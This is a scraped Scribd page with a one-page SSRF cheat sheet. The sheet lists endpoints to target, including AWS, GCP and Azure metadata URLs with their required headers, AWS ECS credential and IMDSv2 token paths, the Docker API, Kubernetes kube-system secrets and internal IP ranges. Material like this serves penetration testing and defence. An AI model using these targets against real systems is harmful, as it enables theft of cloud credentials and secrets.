Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
19 views1 page

SSRF List

The document is a cheat sheet detailing common endpoints and services that are vulnerable to Server-Side Request Forgery (SSRF) exploitation. It lists various cloud platforms and internal services, including AWS, Google Cloud, and Docker, along with their specific purposes and any required headers. This information is crucial for understanding potential security risks associated with SSRF attacks.

Uploaded by

sblue7114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
19 views1 page

SSRF List

The document is a cheat sheet detailing common endpoints and services that are vulnerable to Server-Side Request Forgery (SSRF) exploitation. It lists various cloud platforms and internal services, including AWS, Google Cloud, and Docker, along with their specific purposes and any required headers. This information is crucial for understanding potential security risks associated with SSRF attacks.

Uploaded by

sblue7114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Server-Side Request Forgery (SSRF) Cheat Sheet

Common Endpoints and Services for SSRF Exploitation

1. http://169.254.169.254/latest/meta-data/
• Used by: AWS
• Purpose: Cloud instance metadata, including credentials
2. http://metadata.google.internal/computeMetadata/v1/
• Used by: Google Cloud Platform (GCP)
• Purpose: GCP metadata service
• Headers required: Metadata-Flavor: Google
3. http://169.254.169.254/metadata/instance?api-version=2021-02-01
• Used by: Microsoft Azure
• Purpose: Azure VM metadata
• Headers required: Metadata: true
4. http://localhost:2375/
• Used by: Docker API
• Purpose: Access Docker daemon (if exposed)
5. http://localhost:8000/, 127.0.0.1:8000
• Used by: Internal dashboards, dev servers
6. http://127.0.0.1/admin, /config, /debug
• Used by: Misconfigured web apps or admin panels
7. http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
• Used by: AWS ECS containers
• Purpose: Container credentials
8. http://localhost:8001/api/v1/namespaces/kube-system/secrets
• Used by: Kubernetes API (if exposed)
9. Internal IPs & Services
• Targets: 127.0.0.1, localhost, 192.168.x.x, 10.x.x.x
• Purpose: Access internal services (Redis, MongoDB, etc.)
10. http://169.254.169.254/latest/api/token
• Used by: AWS IMDSv2
• Headers required: X-aws-ec2-metadata-token-ttl-seconds: 21600

Rantu Thakuria | +91 8724924566 | x.com/quadra_v69 | linkedin.com/rantu-dev

You might also like